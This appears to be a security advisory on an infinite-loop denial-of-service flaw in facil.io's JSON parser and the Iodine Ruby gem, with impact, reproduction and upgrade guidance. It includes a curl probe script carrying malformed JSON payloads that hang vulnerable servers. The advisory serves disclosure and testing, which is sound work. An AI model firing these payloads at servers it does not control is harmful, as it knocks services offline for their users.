Facil.io and Iodine JSON Parser Infinite Loop Vulnerability Leading to Denial-of-Service
Vulnerability
A denial-of-service vulnerability has been identified in facil.io, a C micro-framework for web applications, and in the Iodine Ruby gem, which vendors the same JSON parser code. The issue lies in the JSON parsing function 'fio_json_parse', which can enter an infinite loop when it encounters a nested JSON value that starts with 'i' or 'I'. Instead of rejecting the input with a parse error, the parser spins indefinitely and the process consumes nearly 100% of one CPU core. The vulnerability is present in facil.io versions prior to the patch commit and in Iodine versions through 0.7.58.
Impact
A single request carrying such a payload drives the JSON parser into an infinite loop and pins one CPU core at nearly 100% utilisation. In multi-threaded or multi-worker deployments each such request permanently occupies one thread or worker, so repeated requests can exhaust the pool and degrade or stop service for all clients. The affected process does not recover on its own; it must be terminated or restarted.
Reproduction
The vulnerability can be reproduced against facil.io by sending a POST request with a 'Content-Type' of 'application/json' whose body contains a nested value starting with 'i' or 'I'; curl is sufficient for this. The same JSON payloads reproduce the hang against an Iodine HTTP server. Because the affected process stays pinned until it is killed, test only against a disposable instance you control.
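The following probe script is an added example and is not part of this advisory or of the facil.io or Iodine projects. It sends a well-formed control body and two constructed malformed bodies (a nested value beginning with 'i' and one beginning with 'I'; the exact bytes are my assumption, chosen to match the description above) to a URL taken from the TARGET_URL environment variable, and it bounds every request with a curl timeout so the tester's shell never hangs. A curl exit status of 28 (timeout expired) with no response is the signature of the parser spinning.

```shell
#!/bin/sh
# Added example: probes an HTTP endpoint for the fio_json_parse hang.
# Assumptions: TARGET_URL points at a disposable facil.io or Iodine
# instance you control; the payload bodies below are constructed for
# this example and are not taken from the advisory.

# Payloads: a well-formed control, then the two malformed variants.
payload_control() { printf '%s' '{"k": "v"}'; }
payload_lower()   { printf '%s' '{"k": iNotJson}'; }   # nested value starting with 'i'
payload_upper()   { printf '%s' '[I]'; }                # nested value starting with 'I'

# Map curl's exit status to a verdict. 28 means --max-time expired
# without a response, which is consistent with the parser spinning.
verdict_for_status() {
  case "$1" in
    0)  echo "responded" ;;
    28) echo "hung (timeout)" ;;
    *)  echo "curl error $1" ;;
  esac
}

# Send one payload as application/json; never block longer than $2 seconds.
# curl's exit status is captured explicitly so a hang does not abort the
# script under 'set -e'.
probe() {
  url="$1"; secs="$2"; body="$3"; rc=0
  curl -s -o /dev/null --max-time "$secs" \
       -H 'Content-Type: application/json' \
       --data "$body" "$url" || rc=$?
  verdict_for_status "$rc"
}

# Only fire requests when a target was supplied; a hung target keeps one
# core pinned until the server process is killed.
if [ -n "${TARGET_URL:-}" ]; then
  for p in payload_control payload_lower payload_upper; do
    printf '%-16s -> %s\n' "$p" "$(probe "$TARGET_URL" 5 "$($p)")"
  done
fi
```

Run it as TARGET_URL=http://127.0.0.1:3000/ sh probe.sh. A patched server answers all three requests (typically with a 4xx for the malformed bodies); a vulnerable one answers the control and times out on the other two, after which the server process must be restarted.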
Remediation
Users of facil.io should update to a build that includes the patch commit for this issue. Iodine users should update to version 0.7.59 or later and confirm the installed version (for example with 'gem list iodine' or 'bundle show iodine') after upgrading, since the vulnerable parser is vendored inside the gem rather than pulled in as a separate dependency.
